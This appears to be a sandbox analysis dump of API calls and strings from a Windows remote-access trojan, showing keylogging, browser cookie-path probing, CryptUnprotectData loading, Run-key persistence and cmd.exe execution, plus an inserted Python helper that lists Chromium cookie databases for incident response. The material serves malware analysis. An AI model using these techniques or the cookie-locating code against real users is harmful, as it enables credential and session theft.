                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                              • API String ID: 2506810119-1308627793
                                                              • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                              • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                              • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                              • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                                              • GetLastError.KERNEL32 ref: 0044B9B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                                              • String ID: PkGNG
                                                              • API String ID: 2456169464-263838557
                                                              • Opcode ID: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                              • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                                              • Opcode Fuzzy Hash: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                              • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                              • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                              • String ID: /sort "Visit Time" /stext "$0NG
                                                              • API String ID: 368326130-3219657780
                                                              • Opcode ID: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                              • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                              • Opcode Fuzzy Hash: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                              • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00416330
                                                                • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen$CloseCreateValue
                                                              • String ID: !D@$okmode$PG
                                                              • API String ID: 3411444782-3370592832
                                                              • Opcode ID: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                              • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                              • Opcode Fuzzy Hash: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                              • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                              APIs
                                                                • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                              Strings
                                                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                              • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                              • API String ID: 1174141254-1980882731
                                                              • Opcode ID: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                              • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                              • Opcode Fuzzy Hash: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                              • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                              APIs
                                                                • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                              Strings
                                                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                              • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                              • API String ID: 1174141254-1980882731
                                                              • Opcode ID: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                              • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                              • Opcode Fuzzy Hash: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                              • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
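Analyst note on the two PathFileExistsW records above: the sample first checks the browser root under \AppData\Local (Google\Chrome\ and Microsoft\Edge\) and only then probes "User Data\Default\Network\Cookies" and "User Data\Profile ?\Network\Cookies" for the numbered profiles. The helper below is an added responder example, not code from the sample or from Joe Sandbox, that reproduces the same probe order so the cookie stores reachable on a host or mounted image can be listed. The browser table, the profile-number upper bound, the injectable `exists` hook and the treatment of "?" as a profile number are assumptions; the Network\Cookies location is the newer Chromium layout, older builds keep Cookies directly under the profile directory.

```python
"""List the Chromium cookie databases the sample's PathFileExistsW calls
would find. Added analyst example; paths come from the report's strings,
everything else is assumed."""
import os
from pathlib import PureWindowsPath

# Browser roots relative to %LOCALAPPDATA%, as seen in the report's strings.
BROWSER_ROOTS = {
    "chrome": PureWindowsPath("Google", "Chrome"),
    "edge": PureWindowsPath("Microsoft", "Edge"),
}
COOKIE_REL = PureWindowsPath("Network", "Cookies")  # newer Chromium layout
MAX_PROFILE = 20  # assumed upper bound for "Profile N" directories


def profile_cookie_paths(local_appdata, browser, max_profile=MAX_PROFILE):
    """Yield (profile_name, cookie_db_path) for Default and Profile 1..N,
    the same candidates the sample builds from its two format strings."""
    user_data = PureWindowsPath(local_appdata) / BROWSER_ROOTS[browser] / "User Data"
    yield "Default", user_data / "Default" / COOKIE_REL
    for n in range(1, max_profile + 1):
        profile = f"Profile {n}"
        yield profile, user_data / profile / COOKIE_REL


def find_cookie_dbs(local_appdata, exists=os.path.exists, max_profile=MAX_PROFILE):
    """Return [(browser, profile, path)] for every cookie DB that exists.

    `exists` is injectable so the logic runs on a non-Windows analysis box
    or against a mounted image (os.path.exists is only the default)."""
    base = PureWindowsPath(local_appdata)
    hits = []
    for browser, root in BROWSER_ROOTS.items():
        # Mirror the sample: the browser root is checked first and the
        # per-profile probes are skipped entirely when it is absent.
        if not exists(str(base / root)):
            continue
        for profile, path in profile_cookie_paths(local_appdata, browser, max_profile):
            if exists(str(path)):
                hits.append((browser, profile, str(path)))
    return hits


if __name__ == "__main__":
    lad = os.environ.get("LOCALAPPDATA", r"C:\Users\user\AppData\Local")
    for browser, profile, path in find_cookie_dbs(lad):
        print(f"{browser:6} {profile:10} {path}")
```

Run it on the victim's %LOCALAPPDATA% (or point it at a mounted image with a custom `exists`) to know which cookie stores the RAT could have read; any profile it returns is a candidate for session-token revocation.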
                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2B8,004750F0,00000000,00000000), ref: 0040A239
                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2A2,004750F0,00000000,00000000), ref: 0040A249
                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2C4,004750F0,00000000,00000000), ref: 0040A255
                                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread$LocalTimewsprintf
                                                              • String ID: Offline Keylogger Started
                                                              • API String ID: 465354869-4114347211
                                                              • Opcode ID: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                              • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                              • Opcode Fuzzy Hash: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                              • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                              APIs
                                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                              • String ID: Online Keylogger Started
                                                              • API String ID: 112202259-1258561607
                                                              • Opcode ID: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                              • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                              • Opcode Fuzzy Hash: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                              • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                              APIs
                                                              • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LocalTime
                                                              • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                                              • API String ID: 481472006-3277280411
                                                              • Opcode ID: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                              • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                              • Opcode Fuzzy Hash: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                              • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                              • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                                              Strings
                                                              • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Create$EventLocalThreadTime
                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                              • API String ID: 2532271599-1507639952
                                                              • Opcode ID: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                                              • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                              • Opcode Fuzzy Hash: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                                              • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: CryptUnprotectData$crypt32
                                                              • API String ID: 2574300362-2380590389
                                                              • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                              • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                              • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                              • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                              APIs
                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C382,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C30C
                                                              • GetLastError.KERNEL32 ref: 0044C316
                                                              • __dosmaperr.LIBCMT ref: 0044C31D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                              • String ID: PkGNG
                                                              • API String ID: 2336955059-263838557
                                                              • Opcode ID: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                                              • Instruction ID: 8193a85edd99f1e073baf55791db2896ff72ac9ff19ac05387a69161c0de0417
                                                              • Opcode Fuzzy Hash: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                                              • Instruction Fuzzy Hash: FB019032A11108BBDB01DFDDDC4586E7B19EB81320B28034EFD2097280EAB4DD119794
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                              • CloseHandle.KERNEL32(?), ref: 004051CA
                                                              • SetEvent.KERNEL32(?), ref: 004051D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEventHandleObjectSingleWait
                                                              • String ID: Connection Timeout
                                                              • API String ID: 2055531096-499159329
                                                              • Opcode ID: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                                              • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                              • Opcode Fuzzy Hash: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                                              • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8Throw
                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                              • API String ID: 2005118841-1866435925
                                                              • Opcode ID: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                              • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                              • Opcode Fuzzy Hash: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                              • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                              APIs
                                                              • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB9A
                                                              • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FormatFreeLocalMessage
                                                              • String ID: @J@$PkGNG
                                                              • API String ID: 1427518018-1416487119
                                                              • Opcode ID: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                                              • Instruction ID: 923000db8f6a2d31ebee0df48ef62036c6bc2ff20d3f060cbaedccf048ea6ec3
                                                              • Opcode Fuzzy Hash: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                                              • Instruction Fuzzy Hash: 34F0A930B00219A6DF14A766DC4ADFF772DDB44305B10407FB605B21D1DE785D059659
                                                              APIs
                                                              • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                                              • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 00413888
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFE5,?,00000000), ref: 00413893
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateValue
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                              • API String ID: 1818849710-1051519024
                                                              • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                              • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                              • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                              • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                              • String ID: bad locale name
                                                              • API String ID: 3628047217-1405518554
                                                              • Opcode ID: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                              • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                              • Opcode Fuzzy Hash: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                              • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                              APIs
                                                              • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                              • RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                                              • RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateValue
                                                              • String ID: Control Panel\Desktop
                                                              • API String ID: 1818849710-27424756
                                                              • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                              • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                              • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                              • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                              • ShowWindow.USER32(00000009), ref: 00416C9C
                                                              • SetForegroundWindow.USER32 ref: 00416CA8
                                                                • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                              • String ID: !D@
                                                              • API String ID: 3446828153-604454484
                                                              • Opcode ID: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                                              • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                              • Opcode Fuzzy Hash: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                                              • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExecuteShell
                                                              • String ID: /C $cmd.exe$open
                                                              • API String ID: 587946157-3896048727
                                                              • Opcode ID: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                                              • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                              • Opcode Fuzzy Hash: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                                              • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: GetCursorInfo$User32.dll
                                                              • API String ID: 1646373207-2714051624
                                                              • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                              • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                              • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                              • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                              APIs
